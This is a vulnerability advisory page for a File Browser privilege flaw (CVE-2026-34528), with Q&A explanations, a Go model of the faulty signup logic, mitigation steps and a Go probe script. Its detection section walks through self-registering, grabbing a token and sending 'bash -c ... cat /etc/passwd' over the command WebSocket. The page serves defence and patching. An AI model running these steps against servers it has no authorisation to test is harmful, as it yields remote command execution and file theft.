CVE-2026-34528
Command Injection via Improper Permission Handling in File Browser
Publication date: 2026-04-01
Last updated on: 2026-04-06
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| filebrowser | filebrowser | < 2.62.2 (2.62.2 itself is not affected) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-269 | The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor. |
Attack-Flow Graph
AI Powered Q&A
How can this vulnerability impact me? :
On an affected File Browser instance where the administrator has enabled signup, enabled server-side command execution, and set Execute=true in the default user template, anyone who can reach the signup endpoint can create an account that inherits shell execution rights and the template's Commands list. The attacker can then run commands on the server as the File Browser process, which can lead to full system compromise, data theft, data loss, or disruption of services. If signup is disabled, or the default template does not grant Execute, the issue is not reachable.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
Because a self-registered, otherwise unauthenticated user can inherit shell execution rights and run arbitrary commands on the server, an exposed instance gives an outsider control over server operations and over every file the File Browser process can read or write. That can result in data breaches, unauthorized data manipulation, and exposure of sensitive information.
This bears directly on standards and regulations such as GDPR and HIPAA, which require demonstrable controls over who can access, modify, and read protected data. An instance on which unapproved users can execute commands cannot meet those requirements.
The issue is fixed in version 2.62.2; updating to that version or later (and confirming that the default user template no longer grants Execute) is the baseline for staying compliant.
Can you explain this vulnerability to me?
This vulnerability exists in File Browser versions prior to 2.62.2. The signupHandler applies default user permissions but only removes the Admin permission. It does not remove the Execute permission or the Commands list from the default user template. As a result, if an administrator enables signup, server-side execution, and sets Execute=true in the default user template, any unauthenticated user who self-registers gains shell execution capabilities and can run arbitrary commands on the server.
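The following Go program is an added illustration of the permission-handling mistake described above; it is a simplified model written for this page, not File Browser's own signup handler, and the type and function names (DefaultUserTemplate, signupVulnerable, signupFixed, CanExecute) are assumptions. It contrasts a signup path that copies the default template and clears only Admin with one that also clears Execute and the Commands list, and shows what the command endpoint's allow-list check then decides for a self-registered account.

```go
package main

import "fmt"

// Permissions mirrors the shape of File Browser's per-user permission flags.
// This file is an illustrative model of the flaw, not File Browser's code.
type Permissions struct {
	Admin   bool
	Execute bool
	Create  bool
	Modify  bool
}

// User is the minimal slice of a user record relevant to the issue.
type User struct {
	Username string
	Perm     Permissions
	Commands []string // binaries this user may run through the command endpoint
}

// DefaultUserTemplate stands in for the administrator-configured "default
// user" settings that newly created accounts are cloned from (an assumption).
type DefaultUserTemplate struct {
	Perm     Permissions
	Commands []string
}

// signupVulnerable models the pre-2.62.2 behaviour: the template is copied
// onto the new account and only Admin is cleared, so Execute and the Commands
// list leak through to whoever self-registers.
func signupVulnerable(tpl DefaultUserTemplate, username string) User {
	u := User{Username: username, Perm: tpl.Perm, Commands: append([]string(nil), tpl.Commands...)}
	u.Perm.Admin = false
	return u
}

// signupFixed models a hardened handler: an account created by an anonymous
// caller never inherits Execute or a command allow-list, whatever the
// template says. Administrators can still grant these explicitly later.
func signupFixed(tpl DefaultUserTemplate, username string) User {
	u := User{Username: username, Perm: tpl.Perm}
	u.Perm.Admin = false
	u.Perm.Execute = false
	u.Commands = nil
	return u
}

// CanExecute reproduces the gate the command endpoint applies: the Execute
// flag must be set and the requested binary must be on the allow-list.
func (u User) CanExecute(command string) bool {
	if !u.Perm.Execute {
		return false
	}
	for _, c := range u.Commands {
		if c == command {
			return true
		}
	}
	return false
}

func main() {
	// Constructed risky configuration: the admin enabled Execute on the template.
	tpl := DefaultUserTemplate{
		Perm:     Permissions{Admin: true, Execute: true, Create: true},
		Commands: []string{"bash", "git"},
	}
	for name, signup := range map[string]func(DefaultUserTemplate, string) User{
		"vulnerable": signupVulnerable,
		"fixed":      signupFixed,
	} {
		u := signup(tpl, "attacker")
		fmt.Printf("%-10s admin=%v execute=%v commands=%v canRunBash=%v\n",
			name, u.Perm.Admin, u.Perm.Execute, u.Commands, u.CanExecute("bash"))
	}
}
```

The point of the contrast is that the template expresses what an administrator wants for accounts they create themselves; a signup path serves an untrusted caller and has to apply a stricter policy than the template, not merely subtract Admin from it.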
What immediate steps should I take to mitigate this vulnerability?
Upgrade File Browser to version 2.62.2 or later, where the signup handler no longer lets self-registered accounts inherit Execute or the Commands list.
Until the upgrade is done, remove the preconditions: set Execute=false in the default user template and empty its Commands list (in the web UI under the global settings' user defaults, or with the CLI's config set command), and disable server-side command execution if nothing depends on it.
If signup is enabled, disable it temporarily until the patch is applied. Afterwards, audit the user list for accounts that were self-registered while the exposure existed and check whether any of them hold Execute.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability is present when an affected version (below 2.62.2) has signup enabled and the default user template grants Execute; the quickest check is therefore the version plus the signup and default-user settings in the admin UI. To confirm exposure from the outside, self-register an account through the signup API, log in, and inspect the returned JWT: File Browser embeds the account's permissions and command allow-list in the token claims (user.perm.execute and user.commands), so no server access is needed to see what the new account was granted.
Example commands to test the vulnerability (use a throwaway account against an instance you are authorized to test, and delete the account afterwards):
- Self-register a new user: curl -X POST -H 'Content-Type: application/json' -d '{"username":"testuser","password":"testpass"}' https://<filebrowser-server>/api/signup (if the request is rejected, signup is disabled and the precondition is absent)
- Log in as the new user; the response body is the JWT: curl -X POST -H 'Content-Type: application/json' -d '{"username":"testuser","password":"testpass"}' https://<filebrowser-server>/api/login
- Base64url-decode the token's second segment (the payload) and check whether user.perm.execute is true and whether user.commands is non-empty.
- If it is, connect to the command endpoint with a WebSocket client, passing the token in the auth query parameter: wscat -c 'wss://<filebrowser-server>/api/command/?auth=<jwt>'
- Send a command whose first word is on the inherited Commands list, for example bash -c 'id && hostname && cat /etc/passwd | head -3', to verify that arbitrary command execution is possible. File Browser checks only the first word of the command against the allow-list, so any interpreter on that list (bash, sh, python, ...) gives full command execution.
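The following Go program is an added example that automates the signup, login and token-inspection steps above; it is written for this page and is not part of File Browser or this advisory. It assumes the endpoints and claim names given above (/api/signup, /api/login, user.perm.execute, user.commands) and that the login response body is the raw JWT; inspectToken deliberately does not verify the signature, since the goal is only to read what the server claims about the new account. It stops short of running anything over the WebSocket command endpoint.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"io"
	"net/http"
	"os"
	"strings"
)

// tokenClaims is the subset of the JWT payload we care about. The field
// names follow the claims described in the advisory; confirm them against
// a token from the instance you are testing.
type tokenClaims struct {
	User struct {
		Perm struct {
			Admin   bool `json:"admin"`
			Execute bool `json:"execute"`
		} `json:"perm"`
		Commands []string `json:"commands"`
	} `json:"user"`
}

// inspectToken decodes the payload segment of a JWT (no signature check) and
// reports whether the account was granted Execute and which commands it may run.
func inspectToken(token string) (execute bool, commands []string, err error) {
	parts := strings.Split(strings.TrimSpace(token), ".")
	if len(parts) != 3 {
		return false, nil, errors.New("not a JWT: expected three dot-separated segments")
	}
	raw, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil {
		return false, nil, fmt.Errorf("payload is not base64url: %w", err)
	}
	var c tokenClaims
	if err := json.Unmarshal(raw, &c); err != nil {
		return false, nil, fmt.Errorf("payload is not JSON: %w", err)
	}
	return c.User.Perm.Execute, c.User.Commands, nil
}

// postJSON posts a JSON body and returns the response body, failing on non-2xx.
func postJSON(client *http.Client, url string, body any) (string, error) {
	b, _ := json.Marshal(body)
	resp, err := client.Post(url, "application/json", bytes.NewReader(b))
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	out, _ := io.ReadAll(resp.Body)
	if resp.StatusCode/100 != 2 {
		return "", fmt.Errorf("%s: HTTP %d: %s", url, resp.StatusCode, strings.TrimSpace(string(out)))
	}
	return string(out), nil
}

// probe self-registers a throwaway account, logs in, and inspects the token.
// A signup failure usually means signup is disabled, i.e. not exposed.
func probe(base, username, password string) (bool, []string, error) {
	client := &http.Client{}
	creds := map[string]string{"username": username, "password": password}
	if _, err := postJSON(client, base+"/api/signup", creds); err != nil {
		return false, nil, fmt.Errorf("signup failed: %w", err)
	}
	token, err := postJSON(client, base+"/api/login", creds)
	if err != nil {
		return false, nil, fmt.Errorf("login failed: %w", err)
	}
	return inspectToken(token)
}

func main() {
	if len(os.Args) != 4 {
		fmt.Fprintln(os.Stderr, "usage: fbprobe https://<filebrowser-server> <username> <password>")
		os.Exit(2)
	}
	execute, commands, err := probe(os.Args[1], os.Args[2], os.Args[3])
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	if execute {
		fmt.Printf("EXPOSED: self-registered account has execute=true, commands=%v\n", commands)
		os.Exit(1)
	}
	fmt.Println("ok: self-registered account has no execute permission")
}
```

Exit status 1 on either an error or an exposed result makes the program usable from a scheduled job; remember to remove the test account from the instance once the check is done.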